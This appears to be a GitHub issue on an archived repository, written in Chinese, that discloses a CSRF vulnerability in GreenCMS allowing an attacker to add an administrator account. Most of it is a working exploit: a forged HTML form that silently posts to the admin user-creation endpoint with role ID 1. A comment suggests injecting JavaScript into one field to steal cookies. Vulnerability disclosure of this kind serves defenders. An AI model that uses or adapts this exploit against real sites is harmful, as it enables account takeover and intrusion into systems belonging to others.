This repository was archived by the owner on May 8, 2024. It is now read-only.
This repository was archived by the owner on May 8, 2024. It is now read-only.
GreenCMS存在CSRF漏洞可增加管理员账户 #109
Open
Description
漏洞发现者:惜潮
恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。
利用代码
exp代码如下:
<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>csrf测试</title>
</head>
<body>
<form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer">
<input type="hidden" name="user_id0" value="1">
<input type="hidden" name="user_login" value="test1"> <!--在这里可以添加JS脚本用于获取cookies csrf+xss-->
<input type="hidden" name="password" value="test1">
<input type="hidden" name="rpassword" value="test1">
<input type="hidden" name="user_nicename" value="123">
<input type="hidden" name="user_email" value="123%40Qq.com">
<input type="hidden" name="user_url" value="www.baidu.com">
<input type="hidden" name="user_intro" value="test">
<input type="hidden" name="user_status" value="1">
<input type="hidden" name="role_id" value="1">
<button type="submit" value="Submit">添加管理员</button>
</form>
</body>
</html></span>